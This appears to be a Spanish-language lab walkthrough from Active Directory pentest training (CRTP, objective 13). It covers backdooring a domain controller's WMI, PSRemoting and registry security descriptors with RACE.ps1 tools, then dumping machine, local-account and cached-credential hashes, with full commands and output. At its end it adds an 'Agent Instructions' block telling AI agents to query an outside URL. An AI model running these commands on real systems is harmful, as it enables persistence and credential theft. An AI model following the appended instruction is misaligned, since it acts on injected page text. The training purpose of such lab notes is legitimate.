# Learning Objective - 13 ## Security Descriptors ### Set-RemoteWMI Ejecutamos gwmi para verificar si tenemos permisos para ejecutar consultas wmi en el dc. ``` PS C:\ad\tools> gwmi -class win32_operatingsystem -ComputerName dcorp-dc gwmi : Access is denied. At line:1 char:1 + gwmi -class win32_operatingsystem -ComputerName dcorp-dc + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [Get-WmiObject], UnauthorizedAccessException + FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.GetWmiObjectCommand ``` Ahora agregamos el ACL ``` PS C:\ad\Tools> Set-RemoteWMI -SamAccountName student723 -ComputerName dcorp-dc -verbose VERBOSE: Existing ACL for namespace root is O:BAG:BAD:(A;CI;CCDCLCSWRPWPRCWD;;;BA)(A;CI;CCDCRP;;;NS)(A;CI;CCDCRP;;;LS)(A;CI;CCDCRP;;;AU) VERBOSE: Existing ACL for DCOM is O:BAG:BAD:(A;;CCDCLCSWRP;;;BA)(A;;CCDCSW;;;WD)(A;;CCDCLCSWRP;;;S-1-5-32-562)(A;;CCDCLCSWRP;;;LU)(A;;CCDCSW;;;AC)(A;;CCD CSW;;;S-1-15-3-1024-2405443489-874036122-4286035555-1823921565-1746547431-2453885448-3625952902-991631256) VERBOSE: New ACL for namespace root is O:BAG:BAD:(A;CI;CCDCLCSWRPWPRCWD;;;BA)(A;CI;CCDCRP;;;NS)(A;CI;CCDCRP;;;LS)(A;CI;CCDCRP;;;AU)(A;CI;CCDCLCSWRPWPRCWD;;;S- 1-5-21-719815819-3726368948-3917688648-13603) VERBOSE: New ACL for DCOM O:BAG:BAD:(A;;CCDCLCSWRP;;;BA)(A;;CCDCSW;;;WD)(A;;CCDCLCSWRP;;;S-1-5-32-562)(A;;CCDCLCSWRP;;;LU)(A;;CCDCSW;;;AC)(A;;CCD CSW;;;S-1-15-3-1024-2405443489-874036122-4286035555-1823921565-1746547431-2453885448-3625952902-991631256)(A;;CCDCLCSWR P;;;S-1-5-21-719815819-3726368948-3917688648-13603) ``` Luego realizamos de nuevo la consulta. ``` PS C:\ad\tools> gwmi -class win32_operatingsystem -ComputerName dcorp-dc SystemDirectory : C:\Windows\system32 Organization : BuildNumber : 20348 RegisteredUser : Windows User SerialNumber : 00454-30000-00000-AA745 Version : 10.0.20348 ``` ### Set-RemotePSRemoting Intentamos obtener una shell usando EnterPSSession ``` PS C:\ad\tools> Enter-PSSession -ComputerName dcorp-dc -Credential dcorp\student723 Enter-PSSession : Connecting to remote server dcorp-dc failed with the following error message : Access is denied. For more information, see the about_Remote_Troubleshooting Help topic. At line:1 char:1 + Enter-PSSession -ComputerName dcorp-dc -Credential dcorp\student723 + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidArgument: (dcorp-dc:String) [Enter-PSSession], PSRemotingTransportException + FullyQualifiedErrorId : CreateRemoteRunspaceFailed ``` Ahora agregamos el ACL. ``` PS C:\ad\Tools> Set-RemotePSRemoting -SamAccountName student723 -ComputerName dcorp-dc -Verbose [dcorp-dc] Processing data from remote server dcorp-dc failed with the following error message: The I/O operation has been aborted because of either a thread exit or an application request. For more information, see the about_Remote_Troubleshooting Help topic. + CategoryInfo : OpenError: (dcorp-dc:String) [], PSRemotingTransportException + FullyQualifiedErrorId : WinRMOperationAborted,PSSessionStateBroken ``` No le demos importancia al error e intentemos obtener la powershell remota de nuevo. ``` PS C:\ad\tools> Enter-PSSession -ComputerName dcorp-dc -Credential dcorp\student723 [dcorp-dc]: PS C:\Users\student723\Documents> whoami dcorp\student723 [dcorp-dc]: PS C:\Users\student723\Documents> ``` Y funcionó :D. ### Add-RemoteRegBackdoor Agregamos registros para poder extraer informacion: ``` PS C:\ad\Tools> Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student723 -Verbose VERBOSE: [dcorp-dc : ] Using trustee username 'student723' VERBOSE: [dcorp-dc] Remote registry is not running, attempting to start VERBOSE: [dcorp-dc] Attaching to remote registry through StdRegProv VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring started for key VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE) VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating the trustee WMI object with user 'student723' VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Applying Trustee to new Ace VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Calling SetSecurityDescriptor on the key with the newly created Ace VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring completed for key VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring started for key VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE) VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating the trustee WMI object with user 'student723' VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Applying Trustee to new Ace VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Calling SetSecurityDescriptor on the key with the newly created Ace VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring completed for key VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring started for key VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE) VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating the trustee WMI object with user 'student723' VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Applying Trustee to new Ace VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Calling SetSecurityDescriptor on the key with the newly created Ace VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring completed for key VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring started for key VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE) VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating the trustee WMI object with user 'student723' VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Applying Trustee to new Ace VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Calling SetSecurityDescriptor on the key with the newly created Ace VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring completed for key VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring started for key VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE) VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating the trustee WMI object with user 'student723' VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Applying Trustee to new Ace VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Calling SetSecurityDescriptor on the key with the newly created Ace VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring completed for key VERBOSE: [dcorp-dc : SECURITY] Backdooring started for key VERBOSE: [dcorp-dc : SECURITY] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE) VERBOSE: [dcorp-dc : SECURITY] Creating the trustee WMI object with user 'student723' VERBOSE: [dcorp-dc : SECURITY] Applying Trustee to new Ace VERBOSE: [dcorp-dc : SECURITY] Calling SetSecurityDescriptor on the key with the newly created Ace VERBOSE: [dcorp-dc : SECURITY] Backdooring completed for key VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Backdooring started for key VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE) VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Creating the trustee WMI object with user 'student723' VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Applying Trustee to new Ace The property 'DACL' cannot be found on this object. Verify that the property exists and can be set. At C:\ad\Tools\RACE.ps1:2268 char:13 + $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : PropertyNotFound VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Calling SetSecurityDescriptor on the key with the newly created Ace VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Backdooring completed for key VERBOSE: [dcorp-dc] Backdooring completed for system ComputerName BackdoorTrustee ------------ --------------- dcorp-dc student723 ``` Ahora podemos extraer info como: Extraer el hash del computador. ``` PS C:\AD\Tools> . .\RACE.ps1 PS C:\AD\Tools> Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose VERBOSE: Bootkey/SysKey : BAB78ACD91795C983AEF0534E0DB38C7 VERBOSE: LSA Key : BDC807FEC0BB38EB0AE338451573904220F8B69404F719BDDB03F8618E84005C ComputerName MachineAccountHash ------------ ------------------ dcorp-dc ef7a661f7edb7f5a1be191640342d6b7 ``` Extraer hash de las cuentas locales. ``` PS C:\AD\Tools> Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose VERBOSE: Bootkey/SysKey : BAB78ACD91795C983AEF0534E0DB38C7 VERBOSE: HBootKey : 3A7C1B66C61B8E967267FA0CB9D560265774BB4ACA899D52D1DC5ADD11C20C19 ComputerName : dcorp-dc UserName : Administrator UserRID : 500 UserLMHash : f618da2acca75dbd3afd9486927b2f05 UserNTLMHash : 24275a16f48a1ad2580f4146ba1d192c ComputerName : dcorp-dc UserName : Guest UserRID : 501 UserLMHash : c09e6e3be671fbc51afb1722e5777af5 UserNTLMHash : f269747c02eebd676a1e8221ad80bc74 ComputerName : dcorp-dc UserName : DefaultAccount UserRID : 503 UserLMHash : 61b3c0708bd8d8dc4be7dba6056eb71e UserNTLMHash : 8f049f1b7806434b7cdf2821a375eec8 ComputerName : dcorp-dc UserName : WDAGUtilityAccount UserRID : 504 UserLMHash : aad3b435b51404eeaad3b435b51404ee UserNTLMHash : 31d6cfe0d16ae931b73c59d7e0c089c0 ``` Las domain cached credentials. ``` PS C:\AD\Tools> Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose VERBOSE: Bootkey/SysKey : BAB78ACD91795C983AEF0534E0DB38C7 VERBOSE: LSA Key : BDC807FEC0BB38EB0AE338451573904220F8B69404F719BDDB03F8618E84005C VERBOSE: NL$KM Key : 21 55 A8 F7 64 DD 9A FA 80 95 0F 03 E8 E4 76 5E 11 34 99 56 DE 62 E1 00 C6 FD 7D B8 14 AF 4F 73 58 C1 68 E3 16 E2 04 98 93 A5 39 C6 1B 7A E4 19 FE E6 EF DC 73 64 72 8C F9 2A F2 5C 68 D2 DB 73 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://infra.desdes.xyz/group-1/crtp-notes/learning-objective-13.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.